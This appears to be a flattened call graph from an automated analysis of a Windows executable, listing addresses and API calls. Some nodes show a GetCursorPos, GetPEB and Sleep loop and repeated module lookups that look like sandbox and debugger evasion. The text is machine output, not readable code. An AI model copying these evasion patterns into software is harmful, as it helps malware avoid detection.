Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57915->57919 57921 439c0a 57916->57921 57917 437e3a 57923 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57917->57923 57924 437e48 Concurrency::wait 57917->57924 57918->57915 57919->58019 57920 438109 57920->57855 58159 4f37b0 46 API calls 3 library calls 57920->58159 57922 53e01e std::_Facet_Register 17 API calls 57921->57922 57930 439c14 57922->57930 57923->57924 57925 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57924->57925 57925->57885 57926 438fa9 57926->57909 58171 4f37b0 46 API calls 3 library calls 57926->58171 57929 43820b 58160 4f37b0 46 API calls 3 library calls 57929->58160 58185 4edf90 46 API calls 57930->58185 57933 439d0d 57934 414fd0 std::ios_base::clear 46 API calls 57933->57934 57936 439d1c 57934->57936 57935 4390ca 57935->57909 58172 4f37b0 46 API calls 3 library calls 57935->58172 57938 414fd0 std::ios_base::clear 46 API calls 57936->57938 57937 4382df 58036 4389bc 57937->58036 58161 4f37b0 46 API calls 3 library calls 57937->58161 57940 439d37 57938->57940 57942 508d80 70 API calls 57940->57942 57941 438a18 57941->57855 57946 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57941->57946 57944 439d46 57942->57944 57947 43a157 57944->57947 58186 4f39a0 59 API calls 57944->58186 57946->57855 57948 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57947->57948 57956 43a162 57948->57956 57949 4391c2 58173 4f37b0 46 API calls 3 library calls 57949->58173 57951 439d86 57954 43a138 57951->57954 58187 4f37b0 46 API calls 3 library calls 57951->58187 57953 4383e1 58162 4f37b0 46 API calls 3 library calls 57953->58162 58195 4f0610 46 API calls 3 library calls 57954->58195 57958 414fd0 std::ios_base::clear 46 API calls 57956->57958 57962 43a3a2 57958->57962 57959 4384b5 58163 4f37b0 46 API calls 3 library calls 57959->58163 57961 439296 57963 43948e 57961->57963 58174 4f37b0 46 API calls 3 library calls 57961->58174 57965 414fd0 std::ios_base::clear 46 API calls 57962->57965 58178 4f37b0 46 API calls 3 library calls 57963->58178 57968 43a463 57965->57968 58196 432db0 57968->58196 57970 439e88 57970->57954 58188 4f37b0 46 API calls 3 library calls 57970->58188 57971 43938e 58175 4f37b0 46 API calls 3 library calls 57971->58175 57972 439550 58179 4f37b0 46 API calls 3 library calls 57972->58179 57976 439462 58176 4f3a70 46 API calls 57976->58176 57977 439f61 58189 4f3a70 46 API calls 57977->58189 57978 438593 Concurrency::wait 57986 41a1e0 std::ios_base::clear 46 API calls 57978->57986 57978->58036 57981 43947a 58177 41b3b0 43 API calls 2 library calls 57981->58177 57982 439f79 58190 41b3b0 43 API calls 2 library calls 57982->58190 57990 4386fe 57986->57990 57987 439483 57992 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57987->57992 57989 439f85 57994 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 57989->57994 58164 506140 46 API calls 57990->58164 57992->57963 57999 439f90 57994->57999 57996 439624 57996->57909 58180 4f37b0 46 API calls 3 library calls 57996->58180 58191 4f37b0 46 API calls 3 library calls 57999->58191 58000 438730 58165 4f37b0 46 API calls 3 library calls 58000->58165 58012 43a033 58012->57954 58013 438803 58166 4f37b0 46 API calls 3 library calls 58013->58166 58017 43994d 58017->57909 58023 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 58017->58023 58022 43971c 58026 414fd0 std::ios_base::clear 46 API calls 58022->58026 58039 4398f1 58022->58039 58023->57909 58025 4388d7 58167 4f37b0 46 API calls 3 library calls 58025->58167 58028 439818 58026->58028 58181 4f38a0 46 API calls 58028->58181 58036->57941 58168 4f0610 46 API calls 3 library calls 58036->58168 58037 439824 58182 4f37b0 46 API calls 3 library calls 58037->58182 58039->58017 58183 4f0610 46 API calls 3 library calls 58039->58183 58081 4f4e47 58080->58081 58083 4f4e51 58081->58083 58318 40dc90 45 API calls std::ios_base::clear 58081->58318 58084 4f4e64 ctype 58083->58084 58319 505e30 46 API calls 3 library calls 58083->58319 58084->57837 58087 508da0 58086->58087 58088 508e92 GetModuleHandleA 58087->58088 58320 508650 58088->58320 58090 508ed6 58091 508fe4 GetModuleHandleA 58090->58091 58092 508650 57 API calls 58091->58092 58093 509028 58092->58093 58094 509136 GetModuleHandleA 58093->58094 58095 508650 57 API calls 58094->58095 58096 50917a 58095->58096 58097 509288 GetModuleHandleA 58096->58097 58098 508650 57 API calls 58097->58098 58099 5092cc 58098->58099 58100 5093da GetModuleHandleA 58099->58100 58101 508650 57 API calls 58100->58101 58102 50941e 58101->58102 58103 50955c GetModuleHandleA 58102->58103 58104 508650 57 API calls 58103->58104 58105 5095a6 58104->58105 58106 5096f6 GetModuleHandleA 58105->58106 58107 508650 57 API calls 58106->58107 58108 509740 58107->58108 58109 509890 GetModuleHandleA 58108->58109 58110 508650 57 API calls 58109->58110 58111 5098da 58110->58111 58112 509a2a GetModuleHandleA 58111->58112 58113 508650 57 API calls 58112->58113 58114 509a74 58113->58114 58115 509bc4 GetModuleHandleA 58114->58115 58116 508650 57 API calls 58115->58116 58120 509c0e Concurrency::wait 58116->58120 58117 509d06 58118 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 58117->58118 58119 509d1d 58118->58119 58121 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 58119->58121 58120->58117 58340 4150c0 58120->58340 58123 509d25 58121->58123 58125 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 58123->58125 58126 509d2d 58125->58126 58420 4f1460 58126->58420 58127 4150c0 std::bad_exception::bad_exception 46 API calls 58129 509c8c 58127->58129 58344 50a780 58129->58344 58130 4370f9 58130->57854 58144 4f39a0 59 API calls 58130->58144 58132 509c94 58132->58117 58139 4187f5 std::ios_base::clear 58138->58139 58140 418834 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 58139->58140 58503 40dc90 45 API calls std::ios_base::clear 58139->58503 58499 41b790 58140->58499 58143 418866 58143->57845 58144->57870 58145->57877 58146->57883 58148->57854 58149->57864 58150->57873 58151->57880 58152->57886 58153->57899 58154->57908 58155->57917 58156->57897 58157->57906 58158->57920 58159->57929 58160->57937 58161->57953 58162->57959 58163->57978 58164->58000 58165->58013 58166->58025 58167->58036 58168->57941 58169->57848 58170->57926 58171->57935 58172->57949 58173->57961 58174->57971 58175->57976 58176->57981 58177->57987 58178->57972 58179->57996 58180->58022 58181->58037 58182->58039 58183->58017 58184->57902 58185->57933 58186->57951 58187->57970 58188->57977 58189->57982 58190->57989 58191->58012 58195->57947 58197 432de8 __aulldiv Concurrency::wait __vswprintf_s_l 58196->58197 58202 41a1e0 std::ios_base::clear 46 API calls 58197->58202 58223 433b40 Concurrency::wait 58197->58223 58198 41a1e0 std::ios_base::clear 46 API calls 58199 433ba1 58198->58199 58200 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 58199->58200 58201 4339e3 58200->58201 58203 4330e5 58202->58203 58504 410820 58203->58504 58223->58198 58318->58083 58319->58084 58321 508666 58320->58321 58322 50866d _memcpy_s 58320->58322 58321->58090 58322->58321 58424 553db1 44 API calls 2 library calls 58322->58424 58324 508895 58325 508911 lstrcpyA 58324->58325 58326 50895d lstrcatA GetModuleHandleA 58325->58326 58328 5089df 58326->58328 58331 5089f2 58326->58331 58329 54e05e ___std_exception_copy 14 API calls 58328->58329 58330 5089e8 58329->58330 58330->58321 58332 508a81 58331->58332 58333 508a96 58331->58333 58334 508650 54 API calls 58332->58334 58425 554a21 53 API calls 2 library calls 58333->58425 58336 508a8e 58334->58336 58339 54e05e ___std_exception_copy 14 API calls 58336->58339 58337 508aa2 58338 508650 54 API calls 58337->58338 58338->58336 58339->58330 58341 415129 58340->58341 58426 41a340 58341->58426 58343 41515f 58343->58127 58345 50a792 58344->58345 58346 50a7ab 58345->58346 58350 50a7c7 Concurrency::wait 58345->58350 58347 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 58346->58347 58348 50a7b7 58347->58348 58349 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 58348->58349 58375 50a7bf 58349->58375 58352 50a8a7 58350->58352 58433 418520 45 API calls 58350->58433 58434 50b220 46 API calls 58352->58434 58354 50a94e 58355 50a99d 58354->58355 58435 50b220 46 API calls 58354->58435 58357 50aa95 58355->58357 58360 50a9cc 58355->58360 58360->58360 58375->58132 58421 4f1478 58420->58421 58422 4f14cd error_info_injector 58421->58422 58498 40dc20 43 API calls Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 58421->58498 58422->58130 58424->58324 58425->58337 58427 41a357 std::ios_base::clear 58426->58427 58428 41a361 std::ios_base::clear 58427->58428 58432 40dc90 45 API calls std::ios_base::clear 58427->58432 58430 41a374 ctype 58428->58430 58431 41c380 std::ios_base::clear 46 API calls 58428->58431 58430->58343 58431->58430 58432->58428 58433->58352 58434->58354 58435->58355 58498->58422 58500 41b88b ctype 58499->58500 58501 41b80a std::ios_base::clear 58499->58501 58500->58143 58502 41c380 std::ios_base::clear 46 API calls 58501->58502 58502->58500 58503->58140 58505 410863 Concurrency::wait 58504->58505 58506 41a1e0 std::ios_base::clear 46 API calls 58505->58506 59068 4358a0 59069 4358c9 59068->59069 59071 435900 59068->59071 59070 53e35a 3 API calls 59069->59070 59074 4358d3 _Error_objects 59070->59074 59073 43597d _Error_objects 59071->59073 59230 4f4970 46 API calls 59071->59230 59076 53e35a 3 API calls 59073->59076 59079 4359e4 59073->59079 59074->59071 59228 53e28a 46 API calls _Error_objects 59074->59228 59081 4359b7 _Error_objects 59076->59081 59077 4358f3 59229 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 59077->59229 59085 435a61 59079->59085 59233 4f4970 46 API calls 59079->59233 59081->59079 59231 53e28a 46 API calls _Error_objects 59081->59231 59083 4359d7 59232 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 59083->59232 59086 4187e0 46 API calls 59085->59086 59087 435c18 59086->59087 59088 417380 Concurrency::wait 46 API calls 59087->59088 59089 435c70 Concurrency::wait 59088->59089 59090 414e70 std::ios_base::clear 46 API calls 59089->59090 59091 435c8b Concurrency::wait 59090->59091 59091->59091 59092 417380 Concurrency::wait 46 API calls 59091->59092 59093 435cf2 Concurrency::wait 59092->59093 59094 414e70 std::ios_base::clear 46 API calls 59093->59094 59095 435d17 Concurrency::wait 59094->59095 59096 432db0 92 API calls 59095->59096 59097 435d2f 59096->59097 59098 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59097->59098 59099 435d3d 59098->59099 59100 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59099->59100 59101 435d48 59100->59101 59102 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59101->59102 59103 435d53 59102->59103 59104 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59103->59104 59105 435d5e 59104->59105 59106 414fd0 std::ios_base::clear 46 API calls 59105->59106 59107 435d6e 59106->59107 59108 435dbf 59107->59108 59109 414e70 std::ios_base::clear 46 API calls 59107->59109 59110 435e50 59108->59110 59234 4ee3c0 46 API calls 59108->59234 59109->59108 59112 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59110->59112 59125 435e5b Concurrency::wait 59112->59125 59113 435e05 59235 4172e0 46 API calls ctype 59113->59235 59115 435fc9 59117 436b22 59115->59117 59119 53e35a 3 API calls 59115->59119 59123 436023 59115->59123 59116 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59116->59115 59118 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59117->59118 59120 436b2d 59118->59120 59130 435ff6 _Error_objects 59119->59130 59121 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59120->59121 59122 436b35 59121->59122 59126 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59122->59126 59132 4360a3 59123->59132 59238 4f4970 46 API calls 59123->59238 59129 41a1e0 std::ios_base::clear 46 API calls 59125->59129 59133 435f76 59125->59133 59131 436b3d 59126->59131 59128 4360e4 59135 53e35a 3 API calls 59128->59135 59138 436135 59128->59138 59129->59133 59130->59123 59236 53e28a 46 API calls _Error_objects 59130->59236 59239 4f39a0 59 API calls 59132->59239 59133->59115 59133->59116 59143 436108 _Error_objects 59135->59143 59136 436016 59237 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 59136->59237 59141 4361b5 59138->59141 59242 4f4970 46 API calls 59138->59242 59243 4ec9c0 46 API calls 59141->59243 59142 4361eb 59244 4ec980 46 API calls 59142->59244 59143->59138 59240 53e28a 46 API calls _Error_objects 59143->59240 59146 4361fd 59245 4f27a0 43 API calls __Getctype 59146->59245 59147 436128 59241 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 59147->59241 59150 436237 59151 4369f8 59150->59151 59246 4357d0 46 API calls std::bad_exception::bad_exception 59150->59246 59153 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59151->59153 59155 436a08 59153->59155 59154 436275 59247 4f2850 43 API calls __Getctype 59154->59247 59157 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59155->59157 59159 436a13 59157->59159 59158 436280 59248 4f37b0 46 API calls 3 library calls 59158->59248 59160 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59159->59160 59161 436a1e 59160->59161 59162 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59161->59162 59164 436a29 59162->59164 59167 53e35a 3 API calls 59164->59167 59170 436a77 59164->59170 59165 436323 59249 4f3a70 46 API calls 59165->59249 59174 436a4a _Error_objects 59167->59174 59168 43633b 59250 4f2850 43 API calls __Getctype 59168->59250 59173 436af7 59170->59173 59267 4f4970 46 API calls 59170->59267 59268 4f0610 46 API calls 3 library calls 59173->59268 59174->59170 59265 53e28a 46 API calls _Error_objects 59174->59265 59175 436346 59251 4f37b0 46 API calls 3 library calls 59175->59251 59177 436a6a 59266 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 59177->59266 59180 4363f6 Concurrency::wait 59252 506060 46 API calls __Getctype 59180->59252 59183 436446 Concurrency::wait Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error __vswprintf_s_l 59253 420e20 14 API calls 4 library calls 59183->59253 59184 43664f 59185 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59184->59185 59186 43665d 59185->59186 59256 4f2850 43 API calls __Getctype 59186->59256 59189 436640 59191 54e05e ___std_exception_copy 14 API calls 59189->59191 59190 436518 __aulldiv __vswprintf_s_l 59190->59184 59254 4210e0 14 API calls 4 library calls 59190->59254 59191->59184 59192 436668 59257 4f37b0 46 API calls 3 library calls 59192->59257 59193 4365e2 59193->59189 59255 4172e0 46 API calls ctype 59193->59255 59195 436637 59197 54e05e ___std_exception_copy 14 API calls 59195->59197 59197->59189 59198 436718 Concurrency::wait 59258 506060 46 API calls __Getctype 59198->59258 59228->59077 59229->59071 59230->59073 59231->59083 59232->59079 59233->59085 59234->59113 59235->59110 59236->59136 59237->59123 59238->59132 59239->59128 59240->59147 59241->59138 59242->59141 59243->59142 59244->59146 59245->59150 59246->59154 59247->59158 59248->59165 59249->59168 59250->59175 59251->59180 59252->59183 59253->59190 59254->59193 59255->59195 59256->59192 59257->59198 59265->59177 59266->59170 59267->59173 59268->59117 59269 451a26 59273 451a35 Concurrency::wait 59269->59273 59270 4f12c0 43 API calls 59271 453339 59270->59271 59272 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59271->59272 59364 451d76 59272->59364 59274 41a1e0 std::ios_base::clear 46 API calls 59273->59274 59542 453322 59273->59542 59275 451bb2 59274->59275 59276 4f7b50 46 API calls 59275->59276 59277 451c12 Concurrency::wait 59276->59277 59278 414e70 std::ios_base::clear 46 API calls 59277->59278 59279 451c3c Concurrency::wait 59278->59279 59280 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59279->59280 59281 451c53 59280->59281 59282 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59281->59282 59283 451c5e 59282->59283 59547 4186f0 59283->59547 59285 451d28 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 59286 42b840 2 API calls 59285->59286 59287 451d38 59286->59287 59288 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59287->59288 59289 451d46 59288->59289 59290 451d4e 59289->59290 59293 451d81 59289->59293 59291 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59290->59291 59292 451d63 59291->59292 59553 4f12c0 59292->59553 59296 4186f0 46 API calls 59293->59296 59295 451d6b 59297 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59295->59297 59298 451e4b Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 59296->59298 59297->59364 59299 42b840 2 API calls 59298->59299 59300 451e5b 59299->59300 59301 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59300->59301 59302 451e69 59301->59302 59303 451e71 59302->59303 59307 451ea4 59302->59307 59304 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59303->59304 59305 451e86 59304->59305 59306 4f12c0 43 API calls 59305->59306 59308 451e8e 59306->59308 59310 4186f0 46 API calls 59307->59310 59309 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59308->59309 59309->59364 59311 451f6e Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 59310->59311 59312 42b840 2 API calls 59311->59312 59313 451f7e 59312->59313 59314 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59313->59314 59315 451f8c 59314->59315 59316 451f94 59315->59316 59320 451fc7 59315->59320 59317 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59316->59317 59318 451fa9 59317->59318 59319 4f12c0 43 API calls 59318->59319 59321 451fb1 59319->59321 59322 4186f0 46 API calls 59320->59322 59323 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59321->59323 59324 452091 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 59322->59324 59323->59364 59325 42b840 2 API calls 59324->59325 59326 4520a1 59325->59326 59327 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59326->59327 59328 4520af 59327->59328 59329 4520b7 59328->59329 59332 4520ea 59328->59332 59330 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59329->59330 59331 4520cc 59330->59331 59333 4f12c0 43 API calls 59331->59333 59335 4186f0 46 API calls 59332->59335 59334 4520d4 59333->59334 59336 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59334->59336 59337 4521b4 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 59335->59337 59336->59364 59338 42b840 2 API calls 59337->59338 59339 4521c4 59338->59339 59340 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59339->59340 59341 4521d2 59340->59341 59342 4521da 59341->59342 59346 45220d 59341->59346 59343 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59342->59343 59344 4521ef 59343->59344 59345 4f12c0 43 API calls 59344->59345 59347 4521f7 59345->59347 59349 4186f0 46 API calls 59346->59349 59348 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59347->59348 59348->59364 59350 4522d7 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 59349->59350 59351 42b840 2 API calls 59350->59351 59352 4522e7 59351->59352 59353 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59352->59353 59354 4522f5 59353->59354 59355 452330 59354->59355 59356 4522fd 59354->59356 59361 4186f0 46 API calls 59355->59361 59357 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59356->59357 59358 452312 59357->59358 59359 4f12c0 43 API calls 59358->59359 59360 45231a 59359->59360 59362 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59360->59362 59363 4523fa Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 59361->59363 59362->59364 59365 42b840 2 API calls 59363->59365 59366 45240a 59365->59366 59367 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59366->59367 59368 452418 59367->59368 59369 452420 59368->59369 59372 452453 59368->59372 59370 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59369->59370 59371 452435 59370->59371 59373 4f12c0 43 API calls 59371->59373 59376 4186f0 46 API calls 59372->59376 59374 45243d 59373->59374 59377 45251d Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 59376->59377 59378 42b840 2 API calls 59377->59378 59379 45252d 59378->59379 59542->59270 59548 41870e std::ios_base::clear 59547->59548 59549 418744 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 59548->59549 59559 40dc90 45 API calls std::ios_base::clear 59548->59559 59551 41b790 46 API calls 59549->59551 59552 418776 59551->59552 59552->59285 59554 4f137d error_info_injector 59553->59554 59558 4f12f9 error_info_injector 59553->59558 59554->59295 59555 4f133b 59555->59554 59560 40dc20 43 API calls Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 59555->59560 59556 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59556->59558 59558->59555 59558->59556 59559->59549 59560->59554 59561 432300 GetCursorPos 59565 432319 59561->59565 59562 432326 GetCursorPos 59563 4325ff GetPEB 59562->59563 59562->59565 59563->59565 59564 43234e GetPEB 59564->59565 59565->59562 59565->59563 59565->59564 59566 4327a2 Sleep 59565->59566 59567 4324d6 Sleep GetCursorPos 59565->59567 59568 43250e __aulldiv __vswprintf_s_l 59565->59568 59566->59565 59567->59563 59567->59565 59569 431f00 59570 431f53 59569->59570 59571 431f1c 59569->59571 59575 431fb9 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 59570->59575 59585 4f4970 46 API calls 59570->59585 59572 53e35a 3 API calls 59571->59572 59577 431f26 _Error_objects 59572->59577 59574 431fe0 59576 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59574->59576 59575->59574 59578 431fd9 SetCurrentDirectoryA 59575->59578 59579 431fe8 59576->59579 59577->59570 59583 53e28a 46 API calls _Error_objects 59577->59583 59578->59574 59581 431f46 59584 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 59581->59584 59583->59581 59584->59570 59585->59575 59586 54f717 59589 54f587 59586->59589 59590 54f5b4 59589->59590 59591 54f5c6 59589->59591 59616 53e975 GetModuleHandleW 59590->59616 59601 54f418 59591->59601 59594 54f5b9 59594->59591 59617 54f668 GetModuleHandleExW 59594->59617 59596 54f603 59602 54f424 ___unDNameEx 59601->59602 59623 558c01 EnterCriticalSection 59602->59623 59604 54f42e 59624 54f49f 59604->59624 59606 54f43b 59628 54f459 59606->59628 59609 54f61e 59633 54f64f 59609->59633 59611 54f628 59612 54f63c 59611->59612 59613 54f62c GetCurrentProcess TerminateProcess 59611->59613 59614 54f668 std::locale::_Setgloballocale 3 API calls 59612->59614 59613->59612 59615 54f644 ExitProcess 59614->59615 59616->59594 59618 54f6a7 GetProcAddress 59617->59618 59619 54f6c8 59617->59619 59618->59619 59622 54f6bb 59618->59622 59620 54f5c5 59619->59620 59621 54f6ce FreeLibrary 59619->59621 59620->59591 59621->59620 59622->59619 59623->59604 59626 54f4ab ___unDNameEx std::locale::_Setgloballocale 59624->59626 59625 54f50f std::locale::_Setgloballocale 59625->59606 59626->59625 59631 555447 14 API calls 3 library calls 59626->59631 59632 558c49 LeaveCriticalSection 59628->59632 59630 54f447 59630->59596 59630->59609 59631->59625 59632->59630 59636 55cd2e 5 API calls std::locale::_Setgloballocale 59633->59636 59635 54f654 std::locale::_Setgloballocale 59635->59611 59636->59635 59637 480800 59638 480812 Concurrency::wait _Error_objects 59637->59638 59639 41a1e0 std::ios_base::clear 46 API calls 59638->59639 59640 480922 59639->59640 59920 4f4620 59640->59920 59642 480931 59643 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59642->59643 59644 48093c Concurrency::wait 59643->59644 59645 41a1e0 std::ios_base::clear 46 API calls 59644->59645 59646 480a3a 59645->59646 59647 4f4620 46 API calls 59646->59647 59648 480a49 59647->59648 59649 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59648->59649 59650 480a54 Concurrency::wait 59649->59650 59651 41a1e0 std::ios_base::clear 46 API calls 59650->59651 59652 480b52 59651->59652 59653 4f4620 46 API calls 59652->59653 59654 480b61 59653->59654 59655 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59654->59655 59656 480b6c Concurrency::wait 59655->59656 59657 41a1e0 std::ios_base::clear 46 API calls 59656->59657 59658 480c9d 59657->59658 59659 4f4620 46 API calls 59658->59659 59660 480cac 59659->59660 59661 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59660->59661 59662 480cb7 Concurrency::wait 59661->59662 59663 41a1e0 std::ios_base::clear 46 API calls 59662->59663 59664 480de8 59663->59664 59665 4f4620 46 API calls 59664->59665 59666 480df7 59665->59666 59667 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59666->59667 59668 480e02 Concurrency::wait 59667->59668 59669 41a1e0 std::ios_base::clear 46 API calls 59668->59669 59670 480f33 59669->59670 59671 4f4620 46 API calls 59670->59671 59672 480f42 59671->59672 59673 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59672->59673 59674 480f4d Concurrency::wait 59673->59674 59675 41a1e0 std::ios_base::clear 46 API calls 59674->59675 59676 48107e 59675->59676 59677 4f4620 46 API calls 59676->59677 59678 48108d 59677->59678 59679 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59678->59679 59680 481098 Concurrency::wait 59679->59680 59681 41a1e0 std::ios_base::clear 46 API calls 59680->59681 59682 4811c9 59681->59682 59683 4f4620 46 API calls 59682->59683 59684 4811d8 59683->59684 59685 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59684->59685 59686 4811e3 Concurrency::wait 59685->59686 59687 41a1e0 std::ios_base::clear 46 API calls 59686->59687 59688 481314 59687->59688 59689 4f4620 46 API calls 59688->59689 59690 481323 59689->59690 59691 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59690->59691 59692 48132e Concurrency::wait 59691->59692 59693 41a1e0 std::ios_base::clear 46 API calls 59692->59693 59694 48145f 59693->59694 59695 4f4620 46 API calls 59694->59695 59696 48146e 59695->59696 59697 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59696->59697 59698 481479 Concurrency::wait 59697->59698 59699 41a1e0 std::ios_base::clear 46 API calls 59698->59699 59700 4815aa 59699->59700 59701 4f4620 46 API calls 59700->59701 59702 4815b9 59701->59702 59703 417140 Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error 43 API calls 59702->59703 59704 4815c4 Concurrency::wait 59703->59704 59921 4f4653 59920->59921 59923 4f4645 59920->59923 60050 4fb1b0 59921->60050 59923->59642 60051 4fb230 60050->60051 60052 4fb259 60051->60052 60074 41db00 45 API calls std::ios_base::clear 60051->60074 60065 500570 60052->60065 60055 4fb27d Concurrency::wait 60056 4fb2e5 60055->60056 60057 4fb303 60055->60057 60075 501380 43 API calls Concurrency::wait 60056->60075 60076 501380 43 API calls Concurrency::wait 60057->60076 60060 4fb31a 60077 501380 43 API calls Concurrency::wait 60060->60077 60062 4fb2fe 60078 5003e0 43 API calls 2 library calls 60062->60078 60064 4fb39e 60064->59923 60066 500592 60065->60066 60067 50058d 60065->60067 60068 5005a2 60066->60068 60071 5005b3 60066->60071 60079 40db60 RaiseException Concurrency::cancel_current_task 60067->60079 60070 41d950 std::ios_base::clear 46 API calls 60068->60070 60072 5005ab 60070->60072 60071->60072 60073 53e01e std::_Facet_Register 17 API calls 60071->60073 60072->60055 60073->60072 60074->60052 60075->60062 60076->60060 60077->60062 60078->60064 60079->60066 60578 4ce2e0 60579 4ce2ff 60578->60579 60580 53e35a 3 API calls 60579->60580 60586 4ce41f 60579->60586 60581 4ce3f2 _Error_objects 60580->60581 60581->60586 61034 53e28a 46 API calls _Error_objects 60581->61034 60584 4ce412 61035 53e309 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 60584->61035 60587 4ce49f __aulldiv __vswprintf_s_l 60586->60587 61036 4f4970 46 API calls 60586->61036 60848 50c070 60587->60848 60589 4cf660 Concurrency::wait 60589->60589 60591 41a1e0 std::ios_base::clear 46 API calls 60589->60591 60590 4ce540 __aulldiv Concurrency::wait __vswprintf_s_l 60590->60589 60590->60590 60592 41a1e0 std::ios_base::clear 46 API calls 60590->60592 60596 4d0af0 60591->60596 60593 4ce72a 60592->60593 60855 431a40 60593->60855 60597 4d0b41 60596->60597 60600 